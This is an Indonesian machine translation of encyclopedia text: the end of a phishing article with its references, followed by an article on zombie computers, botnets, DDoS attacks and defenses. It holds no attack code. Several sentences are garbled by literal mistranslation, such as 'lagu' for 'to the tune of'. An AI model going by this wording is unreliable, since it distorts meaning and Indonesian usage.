Sikap yang diadopsi oleh perbankan Inggris tubuh APACS adalah bahwa "pelanggan harus juga mengambil tindakan pencegahan yang masuk akal ... sehingga mereka tidak rentan terhadap kriminal." [50] Demikian pula, ketika pertama serentetan serangan phishing Republik Irlandia memukul sektor perbankan pada bulan September 2006, Bank of Irlandia awalnya menolak untuk menutupi kerugian yang diderita oleh pelanggan (dan masih bersikeras bahwa kebijakan untuk tidak melakukannya [51]), meskipun kerugian untuk lagu € 11.300 telah dibuat baik. [52]

Referensi

1. ̂ Tan, Koon. " Phishing and Spamming via IM (SPIM) ". Internet Storm Center . http://isc.sans.org/diary.php?storyid=1905 . Retrieved December 5, 2006 .

2. ̂ Microsoft Corporation. " What is social engineering? " . http://www.microsoft.com/protect/yourself/phishing/engineering.mspx . Retrieved August 22, 2007.

3. ^ a b Jøsang, Audun et al. . " Security Usability Principles for Vulnerability Analysis and Risk Assessment. " (PDF). Proceedings of the Annual Computer Security Applications Conference 2007 (ACSAC'07) . http://www.unik.no/people/josang/papers/JAGAM2007-ACSAC.pdf . Retrieved 2007.

4. ̂ " Spam Slayer: Do You Speak Spam? ". PCWorld.com . http://www.pcworld.com/article/id,113431-page,1/article.html . Retrieved August 16, 2006 .

5. ̂ " "phishing, n." OED Online, March 2006, Oxford University Press. ". Oxford English Dictionary Online . http://dictionary.oed.com/cgi/entry/30004304/ . Retrieved August 9, 2006 .

6. ̂ " Phishing ". Language Log, September 22, 2004 . http://itre.cis.upenn.edu/~myl/languagelog/archives/001477.html . Retrieved August 9, 2006 .

7. ̂ Felix, Jerry and Hauck, Chris (September 1987). "System Security: A Hacker's Perspective". 1987 Interex Proceedings 1 : 6.

8. ̂ " "phish, v." OED Online, March 2006, Oxford University Press. ". Oxford English Dictionary Online . http://dictionary.oed.com/cgi/entry/30004303/ . Retrieved August 9, 2006 .

9. ̂ Ollmann, Gunter. " The Phishing Guide: Understanding and Preventing Phishing Attacks ". Technical Info . http://www.technicalinfo.net/papers/Phishing.html . Retrieved 10 Juli 2006.

10. ̂ " Phishing ". Word Spy . http://www.wordspy.com/words/phishing.asp . Retrieved September 28, 2006 .

11. ̂ Stutz, Michael (January 29, 1998). " AOL: A Cracker's Paradise? ". Wired News . http://wired-vig.wired.com/news/technology/0,1282,9932,00.html .

12. ̂ " History of AOL Warez " . http://www.rajuabju.com/warezirc/historyofaolwarez.htm . Retrieved 2006.

13. ̂ " GP4.3 - Growth and Fraud - Case #3 - Phishing ". Financial Cryptography . December 30, 2005 . https://financialcryptography.com/mt/archives/000609.html .

14. ̂ " In 2005, Organized Crime Will Back Phishers ". IT Management . December 23, 2004 . http://itmanagement.earthweb.com/secu/article.php/3451501 .

15. ̂ " The economy of phishing: A survey of the operations of the phishing market ". First Monday . September 2005 . http://www.firstmonday.org/issues/issue10_9/abad/ .

16. ̂ " Suspicious e-Mails and Identity Theft ". Internal Revenue Service . http://www.irs.gov/newsroom/article/0,,id=155682,00.html . Retrieved July 5, 2006 .

17. ̂ " Phishing for Clues ". Indiana University Bloomington. September 15, 2005 . http://www.browser-recon.info/ .

18. ̂ " What is spear phishing? ". Microsoft Security At Home . http://www.microsoft.com/athome/security/email/spear_phishing.mspx . Retrieved 10 Juli 2006.

19. ̂ Goodin, Dan (April 17, 2008). " Fake subpoenas harpoon 2,100 corporate fat cats ". The Register . http://www.theregister.co.uk/2008/04/16/whaling_expedition_continues/ . .

20. ̂ Kirk, Jeremy (June 2, 2006). " Phishing Scam Takes Aim at MySpace.com ". IDG Network . http://www.pcworld.com/resource/article/0,aid,125956,pg,1,RSS,RSS,00.asp .

21. ̂ " Malicious Website / Malicious Code: MySpace XSS QuickTime Worm ". Websense Security Labs . http://www.websense.com/securitylabs/alerts/alert.php?AlertID=708 . Retrieved December 5, 2006 .

22. ̂ Tom Jagatic and Nathan Johnson and Markus Jakobsson and Filippo Menczer. " Social Phishing " (PDF). To appear in the CACM (October 2007) . http://www.indiana.edu/~phishing/social-network-experiment/phishing-preprint.pdf . Retrieved June 3, 2006 .

23. ̂ " 1-Click Hosting at RapidTec - Warning of Phishing! " . http://rapidshare.de/en/phishing.html . Diakses 21 Desember 2008.

24. ̂ " Torrent of spam likely to hit 6.3 million TD Ameritrade hack victims ". Archived from the original on 2009-05-05 . http://www.webcitation.org/5gY2R1j1g .

25. ̂ Shadowy Russian Firm Seen as Conduit for Cybercrime , by Brian Krebs, Washington post , October 13, 2007

26. ̂ http://www.hsbcusa.com/security/recognize_fraud.html

27. ^ Berners-Lee, Tim. " Uniform Resource Locators (URL) ". IETF Network Working Group . http://www.w3.org/Addressing/rfc1738.txt . Retrieved January 28, 2006.

28. ^ Microsoft. " A security update is available that modifies the default behavior of Internet Explorer for handling user information in HTTP and in HTTPS URLs ". Microsoft Knowledgebase . http://support.microsoft.com/kb/834489 . Retrieved August 28, 2005.

29. ̂ Fisher, Darin. " Warn when HTTP URL auth information isn't necessary or when it's provided ". Bugzilla . https://bugzilla.mozilla.org/show_bug.cgi?id=232567 . Retrieved August 28, 2005.

30. ̂ Johanson, Eric. " The State of Homograph Attacks Rev1.1 ". The Shmoo Group . http://www.shmoo.com/idn/homograph.txt . Retrieved August 11, 2005 .

31. ̂ Evgeniy Gabrilovich and Alex Gontmakher (February 2002). " The Homograph Attack " (PDF). Communications of the ACM 45(2) : 128 . http://www.cs.technion.ac.il/~gabr/papers/homograph_full.pdf .

32. ̂ Leyden, John (August 15, 2006). " Barclays scripting SNAFU exploited by phishers ". The Register . http://www.theregister.co.uk/2006/08/15/barclays_phish_scam/ .

33. ̂ Levine, Jason. " Goin' phishing with eBay ". Q Daily News . http://q.queso.com/archives/001617 . Retrieved December 14, 2006 .

34. ̂ Leyden, John (December 12, 2007). " Cybercrooks lurk in shadows of big-name websites ". The Register . http://www.theregister.co.uk/2007/12/12/phishing_redirection/ .

35. ̂ Mutton, Paul. " Fraudsters seek to make phishing sites undetectable by content filters ". Netcraft . http://news.netcraft.com/archives/2005/05/12/fraudsters_seek_to_make_phishing_sites_undetectable_by_content_filters.html . Retrieved 10 Juli 2006.

36. ̂ Mutton, Paul. " Phishing Web Site Methods ". FraudWatch International . http://www.fraudwatchinternational.com/phishing-fraud/phishing-web-site-methods/ . Retrieved December 14, 2006 .

37. ̂ " Phishing con hijacks browser bar ". BBC News. April 8, 2004 . http://news.bbc.co.uk/1/hi/technology/3608943.stm .

38. ̂ Krebs, Brian. " Flaws in Financial Sites Aid Scammers ". Security Fix . http://blog.washingtonpost.com/securityfix/2006/06/flaws_in_financial_sites_aid_s.html . Retrieved June 28, 2006.

39. ̂ Mutton, Paul. " PayPal Security Flaw allows Identity Theft ". Netcraft . http://news.netcraft.com/archives/2006/06/16/paypal_security_flaw_allows_identity_theft.html . Diakses 19 Juni 2006.

40. ̂ Hoffman, Patrick (January 10, 2007). " RSA Catches Financial Phishing Kit ". eWeek . http://www.eweek.com/article2/0,1895,2082039,00.asp .

41. ̂ Miller, Rich. " Phishing Attacks Continue to Grow in Sophistication ". Netcraft . http://news.netcraft.com/archives/2007/01/15/phishing_attacks_continue_to_grow_in_sophistication.html . Retrieved December 19, 2007 .

42. ̂ Gonsalves, Antone (April 25, 2006). " Phishers Snare Victims With VoIP ". Techweb . http://www.techweb.com/wire/security/186701001 .

43. ̂ " Identity thieves take advantage of VoIP ". Silicon.com. March 21, 2005 . http://www.silicon.com/research/specialreports/voip/0,3800004463,39128854,00.htm .

44. ̂ " Internet Banking Targeted Phishing Attack ". Metropolitan Police Service . 2005-06-03 . http://www.met.police.uk/fraudalert/docs/internet_bank_fraud.pdf . Diperoleh 2009/03/22.

45. ̂ Kerstein, Paul (July 19, 2005). " How Can We Stop Phishing and Pharming Scams? ". CSO . http://www.csoonline.com/talkback/071905.html .

46. ̂ McCall, Tom (December 17, 2007). " Gartner Survey Shows Phishing Attacks Escalated in 2007; More than $3 Billion Lost to These Attacks ". Gartner . http://www.gartner.com/it/page.jsp?id=565125 .

47. ̂ " A Profitless Endeavor: Phishing as Tragedy of the Commons " (PDF). Microsoft . http://research.microsoft.com/~cormac/Papers/PhishingAsTragedy.pdf . Retrieved November 15, 2008 .

48. ̂ " UK phishing fraud losses double ". Finextra. March 7, 2006 . http://www.finextra.com/fullstory.asp?id=15013 .

49. ̂ Richardson, Tim (May 3, 2005). " Brits fall prey to phishing ". The Register . http://www.theregister.co.uk/2005/05/03/aol_phishing/ .

50. ̂ Miller, Rich. " Bank, Customers Spar Over Phishing Losses ". Netcraft . http://news.netcraft.com/archives/2006/09/13/bank_customers_spar_over_phishing_losses.html . Retrieved December 14, 2006 .

51. ̂ " Latest News " . http://applications.boi.com/updates/Article?PR_ID=1430 .

52. ̂ " Bank of Ireland agrees to phishing refunds – vnunet.com " . http://www.vnunet.com/vnunet/news/2163714/bank-ireland-backtracks .

http://en.wikipedia.org/wiki/Phishing

ZOMBIES

Sebuah komputer zombie (sering disingkat sebagai zombie) adalah komputer yang terpasang ke internet yang telah dikompromikan oleh seorang hacker, sebuah virus komputer, atau kuda trojan. Umumnya, sebuah mesin dikompromikan hanyalah satu dari banyak orang di sebuah botnet, dan akan digunakan untuk melakukan tugas-tugas berbahaya atau sejenisnya di bawah arahan terpencil. Sebagian besar pemilik komputer

zombie tidak menyadari bahwa sistem mereka sedang digunakan dalam cara ini. Karena pemilik cenderung tidak menyadari, komputer ini metaforis dibandingkan dengan zombie.

(1) situs web spammer (2) Spammer (3) Spamware (4) Terinfeksi komputer (5) Virus atau trojan (6) Mail server (7) Pengguna (8) Web lalu lintas

Zombie telah digunakan secara ekstensif untuk mengirim e-mail spam; sebagai tahun 2005, diperkirakan 50-80% dari semua email spam di seluruh dunia dikirim oleh komputer zombie. [1] Hal ini memungkinkan para spammer untuk menghindari deteksi dan mungkin mengurangi biaya bandwidth mereka, karena pemilik zombie membayar bandwidth mereka sendiri. Spam ini juga sangat furthers penyebaran Trojan horse; sebagai Trojan, mereka tidak mereplikasi diri. Mereka mengandalkan pergerakan e-mail atau spam untuk tumbuh, sedangkan worm dapat menyebar dengan cara lain. [2]

Untuk alasan yang sama zombie juga digunakan untuk melakukan penipuan klik terhadap situs yang menampilkan membayar per klik iklan. Lain dapat host phishing atau uang keledai merekrut website.

Zombies dapat digunakan untuk melakukan didistribusikan Denial of service serangan, sebuah istilah yang merujuk pada banjir diatur oleh website sasaran tentara zombie komputer. Banyaknya pengguna Internet untuk membuat permintaan secara simultan dari sebuah situs web server yang dimaksudkan untuk menghasilkan menabrak dan pencegahan pengguna yang sah mengakses situs. [3] Sebuah varian dari banjir tipe ini dikenal sebagai didistribusikan degradasi-of-service. Dilakukan oleh "berdenyut" zombie, didistribusikan degradasi-of-layanan adalah moderator dan banjir berkala website, yang dilakukan dengan maksud memperlambat daripada situs menabrak korban. Efektivitas taktik ini muncul dari fakta bahwa banjir intens dapat dengan cepat terdeteksi dan diperbaiki, tetapi serangan zombie berdenyut-denyut dan hasil-down yang lambat dalam mengakses situs web dapat pergi tanpa diketahui selama berbulan-bulan dan bahkan bertahun-tahun. [4]

Penting insiden didistribusikan dan degradasi Denial of Service serangan di masa lalu termasuk serangan atas SPEWS layanan pada tahun 2003, dan satu melawan Blue Frog layanan pada tahun 2006. Pada tahun 2000, beberapa situs terkemuka (Yahoo, eBay, dll) yang tersumbat macet oleh didistribusikan denial of service attack dipasang oleh remaja Kanada. Serangan terhadap grc.com dibahas panjang lebar, dan pelaku, dalam 13 tahun mungkin dari Kenosha, Wisconsin, diidentifikasi di situs Web Gibson Research. Steve Gibson dibongkar sebuah 'bot' zombie yang digunakan dalam serangan , dan menelusuri hal itu kepada para distributor. Dalam catatannya tentang penelitian, ia menjelaskan operasi dari sebuah 'bot'-mengendalikan IRC channel. [5]

Network Intrusion-sistem pencegahan (NIPS) biasanya berguna untuk mencegah, mendeteksi dan memblokir komputer zombie. [6]

Pengguna komputer sering melakukan backup dan menghapus mail yang mencurigakan sebagai tindakan pencegahan terhadap infeksi. [7]

Pemblokiran IRC port 6660-6669 (lihat Daftar TCP dan nomor port UDP) adalah sebuah metode alternatif pencegahan, seperti melarang komunikasi antara komputer yang terinfeksi dan seorang hacker komputer lain via IRC. [Rujukan?]

Mulai bulan Juli tahun 2009, mirip botnet kemampuan juga muncul untuk tumbuh smartphone pasar. Contoh mencakup Juli 2009 di rilis liar dari Seksi Space pesan teks cacing, pertama di dunia yang mampu botnet SMS cacing, yang menargetkan Symbian sistem operasi di Nokia smartphone. Kemudian bulan itu, Charlie Miller mengungkapkan suatu bukti dari konsep pesan teks cacing untuk iPhone di Black Hat. Juga di bulan Juli, Uni Emirat Arab menjadi sasaran konsumen oleh Etisalat BlackBerry program spyware. Pada saat ini, komunitas keamanan dibagi sebagai ke dunia nyata potensi botnets mobile. Namun, dalam sebuah wawancara dengan Agustus 2009 The New York Times, Michael Gregg cybersecurity diringkas konsultan masalah seperti ini: "Kami adalah tentang pada titik dengan ponsel bahwa kami dengan desktop di '80-an."

[Sunting] Referensi

1. ^ Tom Spring, Spam Slayer: membunuh Spam-memuntahkan Zombie PC, PC World, 2005/06/20

2. ^ White, Jay D. (2007). Mengelola Informasi dalam Sektor Publik. ME Sharpe. hlm. 221. ISBN 076561748X.

3. ^ Weisman, Steve (2008). The Truth about Menghindari Penipuan. FT Press. hlm. 201. ISBN 0132333856.

4. ^ Schwabach, Harun (2006). Internet dan Hukum. ABC-Clio. hal. 325. ISBN 1851097317.

5. ^ Steve Gibson, The Serangan terhadap GRC.COM, Gibson Research Corporation, pertama: 2001/05/04, terakhir: 2009/08/12

6. ^ Denial-of-service attack